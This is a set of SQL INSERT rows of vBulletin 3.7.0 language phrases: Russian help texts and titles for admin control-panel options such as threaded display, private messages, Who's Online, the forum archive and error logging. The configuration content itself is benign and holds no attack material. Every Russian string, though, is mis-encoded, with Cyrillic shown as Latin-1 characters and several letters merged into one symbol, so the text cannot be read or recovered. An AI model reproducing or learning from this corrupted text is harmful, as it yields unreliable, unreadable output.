(23513, -1, 'options_options_allowthreadedmode_title', 'cphelptext', 'Ãà çðåøèòü äðåâîâèäÃûé/êîìáèÃèðîâà ÃÃûé ðåæèì ïîêà çà òåì', 'vbulletin', '', 0, ''),
(23514, -1, 'options_options_threadedmode_text', 'cphelptext', ' äðåâîâèäÃîì ðåæèìå îòîáðà æà åòñÿ äåðåâî ññûëîê Ãà èÃäèâèäóà ëüÃûå ñîîáùåÃèÿ òåìû. Äðåâî îòîáðà æà åò, Ãà êà êîå ñîîáùåÃèå â òåìå ïîñòóïèë îòâåò. Òîëüêî îäÃî ñîîáùåÃèå îòîáðà æà åòñÿ çà ðà ç.', 'vbulletin', 'zCarot', 1205942492, '3.7.0 Release Candidate 1'),
(23515, -1, 'options_options_threadedmode_title', 'cphelptext', 'Èñïîëüçîâà òü äðåâîâèäÃûé ðåæèì ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23516, -1, 'options_options_threaded_listdepth_text', 'cphelptext', ' äðåâîâèäÃîì ðåæèìå ñîîáùåÃèÿ èìåþò îòÃîñèòåëüÃóþ äëèÃó. Ãà ïðèìåð, äðåâîâèäÃà ÿ ñòðóêòóðà òà êîâà : \r\n\r\nÑîîáùåÃèå \r\n- Ãåðâûé îòâåò \r\n-- Îòâåò: Ãåðâûé îòâåò \r\n--- Îòâåò: Îòâåò: Ãåðâûé îòâåò \r\n- Âòîðîé îòâåò \r\n-- Îòâåò: Âòîðîé îòâåò \r\n\r\nÅñëè âû ïðîñìà òðèâà åòå \"ÑîîáùåÃèå\", òî \"Ãåðâûé îòâåò\" è \"Âòîðîé îòâåò\" Ãà õîäèòñÿ Ãà 1 óðîâÃÃ¥ ãëóáèÃû. Åñëè âû ïðîñìà òðèâà åòå \"Ãåðâûé îòâåò\", òî \"Îòâåò: Ãåðâûé îòâåò\" Ãà 1 óðîâÃÃ¥ ãëóáèÃû, à \"Îòâåò: Îòâåò: Ãåðâûé îòâåò\" Ãà 2 óðîâÃÃ¥.', 'vbulletin', '', 0, ''),
(23517, -1, 'options_options_threaded_listdepth_title', 'cphelptext', 'ÄðåâîâèäÃûé ðåæèì: ãëóáèÃà îòîáðà æåÃèÿ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23518, -1, 'options_options_threaded_maxcache_text', 'cphelptext', 'Ãòî òî æå ñà ìîå, ÷òî è îïöèÿ \"Ìà êñèìà ëüÃîå êîëè÷åñòâî îòîáðà æà åìûõ ñîîáùåÃèé ïåðåä ïåðåõîäîì Ãà ñëåäóþùóþ ñòðà Ãèöó\" â îòÃîøåÃèè âðåìåÃè çà ãðóçêè òåìû. Åñëè ýòîò ïà ðà ìåòð óñòà Ãîâëåà Ãà 40, òî ôîðóì çà ãðóçèò ìà êñèìóì 40 ñîîáùåÃèé \"â çà ïà ñ\", ïîýòîìó ñòðà Ãèöó ÃÃ¥ ïîòðåáóåòñÿ ïåðåçà ãðóæà òü ñòðà Ãèöó êà æäûé ðà ç äëÿ ýòèõ 40 ñîîáùåÃèé.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23519, -1, 'options_options_threaded_maxcache_title', 'cphelptext', 'ÄðåâîâèäÃûé ðåæèì: ìà êñèìà ëüÃîå êîëè÷åñòâî \"êýøèðóåìûõ\" ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23520, -1, 'options_options_threaded_trimtitle_text', 'cphelptext', 'Ãòà îïöèÿ ññûëà åòñÿ Ãà Ãà çâà Ãèÿ ñîîáùåÃèé, êîòîðûå îòîáðà æà þòñÿ â äðåâå ñîîáùåÃèé â Ãà ÷à ëå òåìû ïðè èñïîëüçîâà Ãèÿ äðåâîâèäÃîãî èëè êîìáèÃèðîâà ÃÃîãî ðåæèìà . \r\n\r\nÎãðà Ãè÷åÃèå ðà çìåðà Ãà çâà Ãèÿ ñîîáùåÃèÿ ìîæåò ïîìî÷ü ñäåëà òü äðåâî ñîîáùåÃèé áîëåå ÷èòà åìûì è ïðåäîòâðà òèòü ïîÿâëåÃèå ãîðèçîÃòà ëüÃîé ïîëîñû ïðîêðóòêè. Ãòî ÿâëÿåòñÿ áîëüøîé ïðîáëåìîé, åñëè äðåâî ñîîáùåÃèé äîñòà òî÷Ãî ãëóáîêîå.', 'vbulletin', '', 0, ''),
(23521, -1, 'options_options_threaded_trimtitle_title', 'cphelptext', 'ÄðåâîâèäÃûé ðåæèì: à êêóðà òÃûå Ãà çâà Ãèÿ', 'vbulletin', '', 0, ''),
(23522, -1, 'options_options_enablepms_text', 'cphelptext', 'Îòïðà âêà ëè÷Ãûõ ñîîáùåÃèé ïîçâîëèò ïîëüçîâà òåëÿì îòïðà âëÿòü ñîîáùåÃèÿ äðóã äðóãó ïðèìåðÃî êà ê ýëåêòðîÃÃûå ïèñüìà , èñïîëüçóÿ ýòîò ôîðóì. Òîëüêî ïîëó÷à òåëü ëè÷Ãîãî ñîîáùåÃèÿ ìîæåò åãî ïðî÷åñòü.', 'vbulletin', '', 0, ''),
(23523, -1, 'options_options_enablepms_title', 'cphelptext', 'Âêëþ÷èòü ëè÷Ãûå ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23524, -1, 'options_options_checknewpm_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, ïîëüçîâà òåëè áóäóò îïîâåùà òüñÿ î ïðèõîäå Ãîâûõ ëè÷Ãûõ ñîîáùåÃèé, ïðè ïðîñìîòðå ôîðóìà . Ñëåäóåò çà ìåòèòü, ÷òî ýòî ÃÃ¥ Ãà ñòîÿùèå ìãÃîâåÃÃûå ñîîáùåÃèÿ, ò.ê. ïîëó÷à òåëü òà êîãî ñîîáùåÃèÿ äîëæåà îòêðûòü ôîðóì, ÷òîáû î Ãåì óçÃà òü.', 'vbulletin', '', 0, ''),
(23525, -1, 'options_options_checknewpm_title', 'cphelptext', 'Ãîääåðæêà ìãÃîâåÃÃûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23526, -1, 'options_options_pmmaxchars_text', 'cphelptext', 'Èñïîëüçóéòå ýòîò ïà ðà ìåòð äëÿ îãðà Ãè÷åÃèÿ äëèÃû ëè÷Ãûõ ñîîáùåÃèé.', 'vbulletin', '', 0, ''),
(23527, -1, 'options_options_pmmaxchars_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà ËÑ', 'vbulletin', '', 0, ''),
(23528, -1, 'options_options_pmfloodtime_text', 'cphelptext', 'Ââåäèòå ìèÃèìà ëüÃîå êîëè÷åñòâî ñåêóÃä, êîòîðûå äîëæÃû ïðîéòè ìåæäó òåì, êà ê ïîëüçîâà òåëü îòïðà âèò åù¸ îäÃî ëè÷Ãîå ñîîáùåÃèå. Èñïîëüçóéòå ýòîò ïà ðà ìåòð äëÿ ïðåäîòâðà ùåÃèÿ ñïà ìà ÷åðåç ëè÷Ãûå ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(23529, -1, 'options_options_pmfloodtime_title', 'cphelptext', 'Ãðåñå÷åÃèå ôëóäà ËÑ - çà äåðæêà ìåæäó ñîîáùåÃèÿìè', 'vbulletin', '', 0, ''),
(23530, -1, 'options_options_pmperpage_text', 'cphelptext', 'Ãà ïðèìåð, åñëè ó ïîëüçîâà òåëÿ 100 ñîîáùåÃèé â ïà ïêå âõîäÿùèå è ýòîò ïà ðà ìåòð ðà âåà 50, òî åãî ëè÷Ãûå ñîîáùåÃèÿ áóäóò ðà çáèòû Ãà 2 ñòðà Ãèöû. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955717, '3.7.0 Release Candidate 4'),
(23531, -1, 'options_options_pmperpage_title', 'cphelptext', 'ËÑ Ãà ñòðà Ãèöó ïî óìîë÷à Ãèþ', 'vbulletin', '', 0, ''),
(23532, -1, 'options_options_pmmaxperpage_text', 'cphelptext', 'Åñëè ó ïîëüçîâà òåëÿ ëè÷Ãûõ ñîîáùåÃèé áîëüøå, ÷åì ðà çðåøåÃî îòîáðà æà òü Ãà îäÃîé ñòðà Ãèöå, òî îÃè áóäóò ðà ñïðåäåëåÃû Ãà ìÃîæåñòâî ñòðà Ãèö. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955736, '3.7.0 Release Candidate 4'),
(23533, -1, 'options_options_pmmaxperpage_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ËÑ Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23534, -1, 'options_options_privallowicons_text', 'cphelptext', 'ÈêîÃêè ñîîáùåÃèÿ - ýòî èçîáðà æåÃèÿ, êà ê ñìà éëû, äëÿ çà ãîëîâêîâ ëè÷Ãûõ ñîîáùåÃèé. Âû ìîæåòå óïðà âëÿòü âà øèìè èêîÃêà ìè ñîîáùåÃèé çäåñü .', 'vbulletin', '', 0, ''),
(23535, -1, 'options_options_privallowicons_title', 'cphelptext', 'Ãà çðåøèòü èñïîëüçîâà Ãèå èêîÃîê â ËÑ', 'vbulletin', '', 0, ''),
(23536, -1, 'options_options_privallowbbcode_text', 'cphelptext', 'BB êîäû ïîçâîëÿþò âà ì äîáà âëÿòü îïðåäåëåÃÃûå html ýëåìåÃòû â ñîîáùåÃèÿ (ïîëóæèðÃûé òåêñò, êóðñèâ, ïîä÷åðêèâà Ãèå, ñïèñêè è ò.ä.).', 'vbulletin', 'zCarot', 1206964503, '3.7.0 Release Candidate 2'),
(23537, -1, 'options_options_privallowbbcode_title', 'cphelptext', 'Ãà çðåøèòü èñïîëüçîâà Ãèå BB êîäîâ â ËÑ', 'vbulletin', 'zCarot', 1206964512, '3.7.0 Release Candidate 2'),
(23538, -1, 'options_options_privallowsmilies_text', 'cphelptext', 'Âêëþ÷èòå ýòó îïöèþ äëÿ âêëþ÷åÃèÿ ïðåîáðà çîâà Ãèÿ êîäîâ ñìà éëîâ â ñîîòâåòñòâóþùèå èçîáðà æåÃèÿ. Âû ìîæåòå óïðà âëÿòü âà øèìè ñìà éëà ìè çäåñü .', 'vbulletin', '', 0, ''),
(23539, -1, 'options_options_privallowsmilies_title', 'cphelptext', 'Ãà çðåøèòü èñïîëüçîâà òü ñìà éëû â ËÑ', 'vbulletin', '', 0, ''),
(23540, -1, 'options_options_privallowbbimagecode_text', 'cphelptext', 'Êîä [IMG] ðà çðåøà åò ïîëüçîâà òåëÿì âêëþ÷à òü èçîáðà æåÃèå â òåêñò. Ãðèìåð: \r\n\r\n[IMG]http://www.example.com/picture.jpg[/IMG]', 'vbulletin', '', 0, ''),
(23541, -1, 'options_options_privallowbbimagecode_title', 'cphelptext', 'Ãà çðåøèòü èñïîëüçîâà Ãèå êîäà [IMG] â ËÑ', 'vbulletin', '', 0, ''),
(23542, -1, 'options_options_privallowhtml_text', 'cphelptext', 'Êîä HTML äà ¸ò ïîëüçîâà òåëÿì îãðîìÃûå ñâîáîäû â ôîðìà òèðîâà Ãèè ñâîèõ ñîîáùåÃèé, Ãî òà êæå ýòî ìîæåò ïðèâåñòè ê èñïîëüçîâà Ãèþ âðåäîÃîñÃûõ ñêðèïòîâ. Ãà çðåøåÃèå êîäà HTML ÃÃ¥ ðåêîìåÃäóåòñÿ.', 'vbulletin', '', 0, ''),
(23543, -1, 'options_options_privallowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML êîä â ËÑ', 'vbulletin', '', 0, ''),
(23544, -1, 'options_options_WOLenable_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè, âû ðà çðåøèòå äîñòóï ê ïðîñìîòðó ñòðà Ãèöû online.php . Ãòà ñòðà Ãèöà ïîêà çûâà åò äåòà ëèçèðîâà ÃÃûé ñïèñîê à êòèâÃûõ Ãà äà ÃÃûé ìîìåÃò ïîëüçîâà òåëåé, èõ ìåñòîïîëîæåÃèå è ò.ä. Ãòà îïöèÿ èñïîëüçóåòñÿ òîëüêî â ñêðèïòå online.php, Ãî ÃÃ¥ â ñïèñêå \"Ãðèñóòñòâóþò\" Ãà options[forumhome]}.php\" target=\"_blank\">ãëà âÃîé ñòðà Ãèöå . \r\nÎòîáðà æà åìûå ìåñòîïîëîæåÃèÿ ïî ðà çäåëà ì ó÷èòûâà þò ïðà âà ïîëüçîâà òåëåé Ãà ïðîñìîòð ýòèõ ðà çäåëîâ. Ãà ïðèìåð, åñëè ïîëüçîâà òåëü ïûòà åòñÿ ïðîñìà òðèâà òü ðà çäåë, ê êîòîðîìó ó Ãåãî Ãåò äîñòóïà , îà áóäåò îòîáðà æåà â ñïèñêå \"Ãðèñóòñòâóþò\", îäÃà êî online.php ïîêà æåò òîëüêî òî, ÷òî îà Ãà õîäèòñÿ Ãà ôîðóìå, ÃÃ¥ óêà çûâà ÿ â êà êîì ðà çäåëå.', 'vbulletin', '', 0, ''),
(23545, -1, 'options_options_WOLenable_title', 'cphelptext', 'ÔóÃêöèÿ \"Êòî Ãà ôîðóìå\" âêëþ÷åÃà ', 'vbulletin', '', 0, ''),
(23546, -1, 'options_options_WOLrefresh_text', 'cphelptext', 'Ñòðà Ãèöà \"Êòî Ãà ôîðóìå\" à âòîìà òè÷åñêè îáÃîâëÿåòñÿ ÷åðåç îïðåäåëåÃÃûé ïðîìåæóòîê âðåìåÃè. Ãòà óñòà Ãîâêà îïðåäåëÿåò ÷à ñòîòó îáÃîâëåÃèÿ.', 'vbulletin', '', 0, ''),
(23547, -1, 'options_options_WOLrefresh_title', 'cphelptext', 'Âðåìÿ îáÃîâëåÃèÿ \"Êòî Ãà ôîðóìå\"', 'vbulletin', '', 0, ''),
(23548, -1, 'options_options_WOLguests_text', 'cphelptext', 'Ãîñòü - ïîëüçîâà òåëü, êîòîðûé ÃÃ¥ à âòîðèçîâà ëñÿ Ãà ôîðóìå èëè ÃÃ¥ çà ðåãèñòðèðîâà à Ãà Ãåì.', 'vbulletin', '', 0, ''),
(23549, -1, 'options_options_WOLguests_title', 'cphelptext', 'Â ôóÃêöèè \"Êòî Ãà ôîðóìå\" îòîáðà æà þòñÿ ãîñòè', 'vbulletin', '', 0, ''),
(23550, -1, 'options_options_WOLresolve_text', 'cphelptext', 'Âêëþ÷åÃèå ýòîé îïöèè à êòèâèðóåò ïðåîáðà çîâà Ãèå IP à äðåñà â à äðåñà óçëîâ Ãà ñòðà Ãèöå \"Êòî Ãà ôîðóìå\". Ãðà âà ïðîñìîòðà IP óêà çûâà þòñÿ â ïðà âà õ ãðóïïû ïîëüçîâà òåëåé .', 'vbulletin', '', 0, ''),
(23551, -1, 'options_options_WOLresolve_title', 'cphelptext', 'Ãðåîáðà çîâûâà òü IP à äðåñ Ãà ñòðà Ãèöå \"Êòî Ãà ôîðóìå\"', 'vbulletin', '', 0, ''),
(23552, -1, 'options_options_enablespiders_text', 'cphelptext', 'Ãîèñêîâûå ìà øèÃû - ïðîãðà ììû, êîòîðûå èññëåäóþò èÃòåðÃåò äëÿ ïîèñêà ñà éòîâ. Åñëè âêëþ÷èòü ýòó îïöèþ, Ãåà âòîðèçîâà ÃÃûå ïîëüçîâà òåëè áóäóò ðà çäåëÿòüñÿ ñèñòåìîé Ãà ïðîñòî ãîñòåé è ïîèñêîâûå ìà øèÃû.', 'vbulletin', '', 0, ''),
(23553, -1, 'options_options_enablespiders_title', 'cphelptext', 'Îòîáðà æà òü ïîèñêîâûå ìà øèÃû', 'vbulletin', '', 0, ''),
(23554, -1, 'options_options_archiveenabled_text', 'cphelptext', 'Ãåêîòîðûå ïîèñêîâûå äâèæêè ÃåêîððåêòÃî èÃäåêñèðóþò äèÃà ìè÷åñêèå ñòðà Ãèöû ñ ïà ðà ìåòðà ìè â à äðåñå, Ãà ïðèìåð http://www.example.com/index.php?parameter=value. ÎñîáåÃÃîñòü à ðõèâà - äà âà òü äâèæêó ïîèñêà ïîñòîÿÃÃûå URL à äðåñà äëÿ äîñòóïà ê ñîäåðæèìîìó ôîðóìà .', 'vbulletin', '', 0, ''),
(23555, -1, 'options_options_archiveenabled_title', 'cphelptext', 'Âêëþ÷èòü à ðõèâ ôîðóìà ', 'vbulletin', '', 0, ''),
(23556, -1, 'options_options_archive_threadtype_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ññûëêè Ãà òåìû â à ðõèâå ñòà Ãóò ñâÿçà ÃÃûìè ñ ôà êòè÷åñêèìè òåìà ìè Ãà ôîðóìå (äèÃà ìè÷åñêèå à äðåñà è ïðî÷åå). Ãà ïðèìåð, âìåñòî: \r\n\r\nhttp://www.example.com/forum/archive/index.php/t-1.html \r\n\r\n...áóäåò: \r\n\r\nhttp://www.example.com/forum/showthread.php?t=1 ', 'vbulletin', '', 0, ''),
(23557, -1, 'options_options_archive_threadtype_title', 'cphelptext', 'Îòîáðà æà òü òåìû â ïðîñòîì âèäå', 'vbulletin', '', 0, ''),
(23558, -1, 'options_options_archive_threadsperpage_text', 'cphelptext', 'Ââåäèòå êîëè÷åñòâî òåì, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå à ðõèâà òåì. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955752, '3.7.0 Release Candidate 4'),
(23559, -1, 'options_options_archive_threadsperpage_title', 'cphelptext', 'ÀðõèâÃûõ òåì Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23560, -1, 'options_options_archive_postsperpage_text', 'cphelptext', 'Ââåäèòå êîëè÷åñòâî ñîîáùåÃèé, îòîáðà æà åìûõ Ãà îäÃîé ñòðà Ãèöå â òåìå à ðõèâà . \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955760, '3.7.0 Release Candidate 4'),
(23561, -1, 'options_options_archive_postsperpage_title', 'cphelptext', 'Êîëè÷åñòâî ñîîáùåÃèé Ãà ñòðà Ãèöó ïðè ïðîñìîòðå à ðõèâà ', 'vbulletin', '', 0, ''),
(23562, -1, 'options_options_adminquickstats_text', 'cphelptext', 'Ãòà óñòà Ãîâêà îòÃîñèòñÿ ê ãëà âÃîé ñòðà Ãèöå êîÃòðîëüÃîé ïà Ãåëè à äìèÃèñòðà òîðà .', 'vbulletin', '', 0, ''),
(23563, -1, 'options_options_adminquickstats_title', 'cphelptext', 'Êðà òêà ÿ ñòà òèñòèêà Ãà ïà Ãåëè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(23564, -1, 'options_options_cpstylefolder_text', 'cphelptext', 'Âûáåðèòå ñòèëü êîÃòðîëüÃûõ ïà Ãåëåé à äìèÃèñòðà òîðà è ìîäåðà òîðà .', 'vbulletin', '', 0, ''),
(23565, -1, 'options_options_cpstylefolder_title', 'cphelptext', 'Äèðåêòîðèÿ ñòèëåé ïà Ãåëåé óïðà âëåÃèÿ', 'vbulletin', '', 0, ''),
(23566, -1, 'options_options_timeoutcontrolpanel_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ñèñòåìà áóäåò ïðîñèòü à äìèÃèñòðà òîðîâ çà Ãîâî âîéòè â ïà Ãåëü à äìèÃèñòðà òîðà , åñëè îÃè òà ì ñëèøêîì äîëãî. Ãòî, êîÃå÷Ãî, áåçîïà ñÃåå, Ãî î÷åÃü ðà çäðà æà åò.', 'vbulletin', '', 0, ''),
(23567, -1, 'options_options_timeoutcontrolpanel_title', 'cphelptext', 'Òà éìà óò ïà Ãåëè à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(23568, -1, 'options_options_cp_collapse_forums_text', 'cphelptext', 'Ãòà óñòà Ãîâêà îòÃîñèòñÿ ê ýòîé ñòðà Ãèöå .', 'vbulletin', '', 0, ''),
(23569, -1, 'options_options_cp_collapse_forums_title', 'cphelptext', 'Ãà çðåøèòü ñâåðòûâà Ãèå â óïðà âëåÃèè ðà çäåëà ìè', 'vbulletin', '', 0, ''),
(23570, -1, 'options_options_cp_usereditcolumns_text', 'cphelptext', 'Ãòà óñòà Ãîâêà îòÃîñèòñÿ ê ýòîé ñòðà Ãèöå .', 'vbulletin', '', 0, ''),
(23571, -1, 'options_options_cp_usereditcolumns_title', 'cphelptext', 'Ñòîëáöû â óïðà âëåÃèè ïîëüçîâà òåëÿìè', 'vbulletin', '', 0, ''),
(23572, -1, 'options_options_externaljs_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , ïîëüçîâà òåëÿì áóäåò ðà çðåøåÃî ïîëó÷à òü ñîîáùåÃèÿ î ïîñëåäÃèõ òåìà õ â âûáðà ÃÃîì ðà çäåëå(à õ). Îà ìîæåò áûòü âêëþ÷åà Ãà âåá-ñòðà Ãè÷êó äëÿ ïîëó÷åÃèÿ äèÃà ìè÷åñêîãî ñîäåðæà Ãèÿ.\r\n \r\nÃòà îïöèÿ ïîçâîëÿåò èñïîëüçîâà òü âÃåøÃèé javascript.', 'vbulletin', '', 0, ''),
(23573, -1, 'options_options_externaljs_title', 'cphelptext', 'Ãà çðåøèòü âñòà âêó Javascript', 'vbulletin', '', 0, ''),
(23574, -1, 'options_options_externalrss_text', 'cphelptext', 'Âêëþ÷èâ ýòó îïöèþ, âû ðà çðåøà åòå ïîëüçîâà òåëÿì ïîëó÷à òü ñîîáùåÃèÿ î ïîñëåäÃèõ òåìà õ â âûáðà ÃÃîì ðà çäåëå(à õ). Îà ìîæåò áûòü âêëþ÷åà Ãà âåáñòðà Ãè÷êó èëè â ñïåöèà ëüÃóþ ïðîãðà ììó äëÿ ÷òåÃèÿ RSS, ÷òîáû ïîääåðæèâà òü à âòîìà òè÷åñêîå îáÃîâëåÃèå îòîáðà æåÃèÿ ïîñëåäÃèõ òåì.\r\n \r\nÃòà îïöèÿ èñïîëüçóåò RSS ýêñïîðò.', 'vbulletin', '', 0, ''),
(23575, -1, 'options_options_externalrss_title', 'cphelptext', 'Ãà çðåøèòü âñòà âêó RSS', 'vbulletin', '', 0, ''),
(23576, -1, 'options_options_externalxml_text', 'cphelptext', 'Âêëþ÷èâ ýòó îïöèþ, âû ðà çðåøà åòå ïîëüçîâà òåëÿì ïîëó÷à òü ñîîáùåÃèÿ î ïîñëåäÃèõ òåìà õ â âûáðà ÃÃîì ðà çäåëå(à õ). Îà ìîæåò áûòü âêëþ÷åà Ãà âåáñòðà Ãè÷êó èëè â äðóãóþ ïðîãðà ììó, ÷òîáû ïîääåðæèâà òü à âòîìà òè÷åñêîå îáÃîâëåÃèå îòîáðà æåÃèÿ ïîñëåäÃèõ òåì.\r\n \r\nÃòà îïöèÿ èñïîëüçóåò XML ýêñïîðò.', 'vbulletin', '', 0, ''),
(23577, -1, 'options_options_externalxml_title', 'cphelptext', 'Ãà çðåøèòü âñòà âêó XML', 'vbulletin', '', 0, ''),
(23578, -1, 'options_options_externalcutoff_text', 'cphelptext', 'Ãòà îïöèÿ îïðåäåëÿåò, Ãà ñêîëüêî äà ëåêî ïî âðåìåÃè áóäåò çà õîäèòü ïîèñê Ãîâûõ ñîîáùåÃèé â òåìà õ. Îïòèìà ëüÃî Ãà ñòðîèòü òà ê, ÷òîáû âûäà âà ëîñü ïðèìåðÃî 15 ðåçóëüòà òîâ. Ãà áîëüøèõ ôîðóìà õ îáÃîâëÿåòñÿ 15 è áîëåå òåì â ÷à ñ, ïîýòîìó ñëåäóåò óñòà Ãîâèòü ìèÃèìà ëüÃîå çÃà ÷åÃèå, òî åñòü 1 . Äëÿ ìåÃåå îáÃîâëÿåìûõ ôîðóìîâ ýòî çÃà ÷åÃèå ñòîèò óâåëè÷èòü, Ãî ÃÃ¥ áîëåå 24 ÷à ñîâ.', 'vbulletin', '', 0, ''),
(23579, -1, 'options_options_externalcutoff_title', 'cphelptext', 'Âûáîðêà òåì', 'vbulletin', '', 0, ''),
(23580, -1, 'options_options_errorlogdatabase_text', 'cphelptext', 'Ââåäèòå ïîëÃûé ïóòü Ãà ñåðâåðå. Âû ìîæåòå çà ïèñûâà òü îøèáêè áà çû äà ÃÃûõ â ôà éë, åñëè ÃÃ¥ æåëà åòå óçÃà âà òü î Ãèõ ïîñðåäñòâîì ýëåêòðîÃÃîé ïî÷òû. \r\n \r\n ýòîò ôà éë ÃÃ¥ áóäóò çà ïèñûâà òüñÿ îøèáêè ñîåäèÃÃ¥Ãèÿ ñ áà çîé äà ÃÃîé. ×òîáû ïîëó÷à òü óâåäîìëåÃèÿ î òà êèõ îøèáêà õ, âû äîëæÃû âêëþ÷èòü óâåäîìëåÃèå ïî ýëåêòðîÃÃîé ïî÷òå ïóò¸ì óêà çà Ãèÿ ñâîåãî à äðåñà â ôà éëå config.php.', 'vbulletin', 'zCarot', 1209381080, '3.7.0'),
(23581, -1, 'options_options_errorlogdatabase_title', 'cphelptext', 'Çà ïèñûâà òü îøèáêè áà çû äà ÃÃûõ â ôà éë', 'vbulletin', '', 0, ''),
(23582, -1, 'options_options_errorlogsecurity_text', 'cphelptext', 'Ââåäèòå ïîëÃûé ïóòü Ãà ñåðâåðå. Çà ïèñü Ãåóäà ÷Ãûõ ïîïûòîê âõîäîâ â ïà Ãåëü à äìèÃèñòðà òîðà ïîëåçÃà äëÿ òîãî, ÷òîáû óçÃà òü î ïîïûòêà õ âçëîìà òü âà ø ôîðóì.', 'vbulletin', '', 0, ''),
(23583, -1, 'options_options_errorlogsecurity_title', 'cphelptext', 'Çà ïèñü ïîïûòîê äîñòóïà ê ïà Ãåëè à äìèÃèñòðà òîðà â ôà éë', 'vbulletin', '', 0, ''),
(23584, -1, 'options_options_errorlogphp_text', 'cphelptext', 'Ââåäèòå ñþäà ïóòü. Ãà ïðèìåð, Ãà ñåðâåðå ïîä óïðà âëåÃèåì Windows ïóòü äîëæåà áûòü ïîõîæèì Ãà ýòîò: \r\nC:\\logs\\vbulletin.log \r\n\r\nÃà ñåðâåðå ïîä óïðà âëåÃèåì *nix äîëæÃî áûòü ÷òî-òî âðîäå: \r\n\r\n/home/tvojsajt/logs/vbulletin.log ', 'vbulletin', '', 0, ''),
(23585, -1, 'options_options_errorlogphp_title', 'cphelptext', 'Ñîõðà Ãÿòü ïðåäóïðåæäåÃèÿ PHP â ôà éë', 'vbulletin', '', 0, ''),
(23586, -1, 'options_options_errorlogmaxsize_text', 'cphelptext', 'Ââåäèòå ðà çìåð â áà éòà õ. 1048576 áà éò = 1 ìåãà áà éò.', 'vbulletin', '', 0, ''),
(23587, -1, 'options_options_errorlogmaxsize_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð çà ïèñåé îøèáîê', 'vbulletin', '', 0, ''),
(23588, -1, 'options_options_disableerroremail_text', 'cphelptext', 'Åñëè âû ÃÃ¥ æåëà åòå óçÃà âà òü îá îøèáêà õ áà çû äà ÃÃûõ ïî ýëåêòðîÃÃîé ïî÷òå, òî óñòà Ãîâèòå ýòó îïöèþ â \"Äà \". ÃåêîìåÃäóåòñÿ îñòà âèòü êà ê ìèÃèìóì îäÃó ôóÃêöèþ îïîâåùåÃèÿ îá îøèáêà õ - îïîâåùåÃèå ïî ýëåêòðîÃÃîé ïî÷òå èëè â ôà éë.', 'vbulletin', '', 0, ''),
(23589, -1, 'options_options_disableerroremail_title', 'cphelptext', 'Îòêëþ÷èòü îòñûëêó ýëåêòðîÃÃûõ ïèñåì îá îøèáêà õ áà çû äà ÃÃûõ', 'vbulletin', '', 0, ''),
(23590, -1, 'options_options_enablehooks_text', 'cphelptext', 'Ñèñòåìà ìîäóëåé/ïðîäóêòîâ ïîçâîëÿåò âñòà âèòü ïðîèçâîëüÃûé êîä â îïðåäåë¸ÃÃûå ìåñòà PHP ôà éëîâ, áåç èçìåÃÃ¥Ãèÿ ñà ìèõ ôà éëîâ. Ãòî ìîæåò ïîìî÷ü ðà ñøèðèòü ôóÃêöèè ôîðóìà áåç âìåøà òåëüñòâà â êîä. \r\n\r\n öåëÿõ ïðåäîòâðà ùåÃèÿ ïðîáëåì, ñ ïîìîùüþ ýòîé îïöèè âû ìîæåòå âûêëþ÷èòü ñèñòåìó ìîäóëåé/ïðîäóêòîâ.', 'vbulletin', '', 0, ''),
(23591, -1, 'options_options_enablehooks_title', 'cphelptext', 'Âêëþ÷èòü ñèñòåìó ìîäóëåé/ïðîäóêòîâ', 'vbulletin', '', 0, ''),
(23592, -1, 'options_options_usercss_allowed_font_sizes_text', 'cphelptext', 'Ñïèñîê ðà çðåø¸ÃÃûõ ðà çìåðîâ øðèôòîâ äëÿ èçìåÃÃ¥Ãèÿ îòîáðà æåÃèÿ ïðîôèëÿ ïîëüçîâà òåëÿ. Ãà çäåëÿéòå êà æäûé ðà çìåð øðèôòà ïåðåâîäîì ñòðîêè. Âû ìîæåòå óêà çà òü ëþáûå ðà çìåðû, êîòîðûå äîïóñòèìû â CSS.', 'vbulletin', 'zCarot', 1195732626, '3.7.0 Beta 1'),
(23593, -1, 'options_options_usercss_allowed_font_sizes_title', 'cphelptext', 'Ãà çðåø¸ÃÃûå ðà çìåðû øðèôòîâ', 'vbulletin', 'zCarot', 1195732626, '3.7.0 Beta 1'),
(23594, -1, 'options_options_usercss_allowed_border_widths_text', 'cphelptext', 'Ñïèñîê ðà çðåø¸ÃÃûõ çÃà ÷åÃèé äëÿ øèðèÃû ãðà Ãèö (border width) äëÿ èçìåÃÃ¥Ãèÿ îòîáðà æåÃèÿ ïðîôèëÿ ïîëüçîâà òåëÿ. Ãà çäåëÿéòå êà æäûé ðà çìåð øèðèÃû ãðà Ãèö ïåðåâîäîì ñòðîêè.', 'vbulletin', 'zCarot', 1195732662, '3.7.0 Beta 1'),
